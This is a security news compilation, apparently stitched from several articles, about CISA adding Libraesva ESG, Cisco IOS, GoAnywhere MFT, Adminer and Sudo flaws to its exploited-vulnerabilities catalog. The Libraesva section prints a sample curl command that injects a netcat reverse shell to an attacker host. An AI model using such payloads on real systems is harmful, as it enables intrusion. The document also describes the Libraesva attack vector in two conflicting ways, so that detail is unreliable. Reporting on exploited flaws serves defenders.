CISA Alerts on Actively Exploited Vulnerabilities in Key Software
CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks
The vulnerability permits unauthenticated attackers to execute arbitrary system commands on affected devices, posing significant risks of email compromise and data exfiltration. Initial discovery of this security weakness surfaced after multiple security firms detected unusual traffic directed at public-facing ESG appliances across Europe and North America.
Attackers swiftly weaponized proof-of-concept exploits, leveraging the flaw’s straightforward payload delivery, typically via a crafted HTTP POST request to an exposed management interface. Organizations using Libraesva ESG for spam and phishing defense are at risk, as exploitation often leads to full device takeover. CISA analysts have noted that attackers exploiting CVE-2025-59689 operate with speed and stealth, leaving minimal traces in security logs. Successful exploitation allows payloads to enable remote shell access, install additional malware packages, and utilize the ESG appliance as a pivot point for internal reconnaissance.
CISA documented several incidents where attackers deployed reverse shells to create persistent access channels post-compromise. The infection mechanism is a classic OS command injection. An attacker submits a specially crafted request to the web-based management API, embedding command payloads in user-supplied parameters. For example:
curl -X POST "https://target-esg/management/api[.]php" -d '[cmd]=;nc -e /bin/bash attacker[.]com 4444'
This command shows how the flaw allows an external actor to spawn a remote shell directly to the attacker's system, bypassing authentication controls. CISA researchers found that many incidents occurred due to ESG appliances lacking recent security updates, highlighting the need for timely patching. The ongoing exploitation of CVE-2025-59689 underscores the importance of robust patch management and vigilant monitoring of security infrastructure for signs of compromise.
U.S. CISA adds Adminer, Cisco IOS, Fortra GoAnywhere MFT, Libraesva ESG, and Sudo flaws to its Known Exploited Vulnerabilities catalog
- CVE-2021-21311: Adminer Server-Side Request Forgery Vulnerability.
- CVE-2025-20352: Cisco IOS and IOS XE Stack-based Buffer Overflow Vulnerability.
- CVE-2025-10035: Fortra GoAnywhere MFT Deserialization of Untrusted Data Vulnerability.
- CVE-2025-59689: Libraesva Email Security Gateway Command Injection Vulnerability.
- CVE-2025-32463: Sudo Inclusion of Functionality from Untrusted Control Sphere Vulnerability.
Last week, Cisco fixed the actively exploited zero-day CVE-2025-20352, which impacts Cisco IOS and IOS XE Software. This high-severity vulnerability resides in the SNMP subsystem, allowing remote authenticated attackers to trigger a DoS condition or achieve root code execution.
The root cause is a stack overflow in the SNMP subsystem, impacting all devices with SNMP enabled. Cisco's Product Security Incident Response Team (PSIRT) is aware of attacks exploiting this vulnerability.
Another critical flaw added to the KEV catalog is CVE-2025-10035. A cybersecurity firm revealed credible evidence that this flaw was exploited in the wild as early as September 10, 2025, preceding its public disclosure. This vulnerability allows an attacker to execute arbitrary commands on affected systems.
Fortra recommends upgrading to a patched version (7.8.4 or Sustain Release 7.6.3) to mitigate this vulnerability and advises restricting public access to the GoAnywhere Admin Console, as exploitation depends on internet exposure.
CISA added vulnerability CVE-2025-59689 after Libraesva reported nation-state actors exploiting the command injection flaw in its Email Security Gateway. An attacker can trigger the vulnerability by sending malicious emails containing specially crafted compressed attachments, allowing arbitrary commands to be executed.
Additionally, early July disclosed vulnerabilities in the Sudo command-line utility for Unix-like systems allow local attackers to escalate privileges to root. The vulnerabilities include:
- CVE-2025-32462: Sudo before 1.9.17p1, when configured with certain sudoers files, allows listed users to execute commands on unintended machines.
- CVE-2025-32463: Allows local users to obtain root access due to improper handling of /etc/nsswitch.conf from a user-controlled directory when using the -chroot option.
Experts recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure. Federal agencies are mandated to resolve these vulnerabilities by October 20, 2025.
CISA Sounds Alarm on Critical Sudo Flaw Actively Exploited in Linux and Unix Systems
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw impacting the Sudo command-line utility for Linux and Unix-like operating systems to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.
The vulnerability, identified as CVE-2025-32463 with a CVSS score of 9.3, affects Sudo versions prior to 1.9.17p1. It was disclosed by Stratascale researcher Rich Mirch in July 2025. CISA noted that this vulnerability could allow local attackers to leverage Sudo's -R (--chroot) option to run arbitrary commands as root, even if they are not listed in the sudoers file.
CISA has also added other flaws to the KEV catalog:
- CVE-2021-21311: Adminer server-side request forgery vulnerability.
- CVE-2025-20352: Cisco IOS and IOS XE stack-based buffer overflow vulnerability.
- CVE-2025-10035: Fortra GoAnywhere MFT deserialization of untrusted data vulnerability.
- CVE-2025-59689: Libraesva Email Security Gateway command injection vulnerability.
Federal Civilian Executive Branch (FCEB) agencies relying on the affected products are advised to apply necessary mitigations by October 20, 2025, to secure their networks.
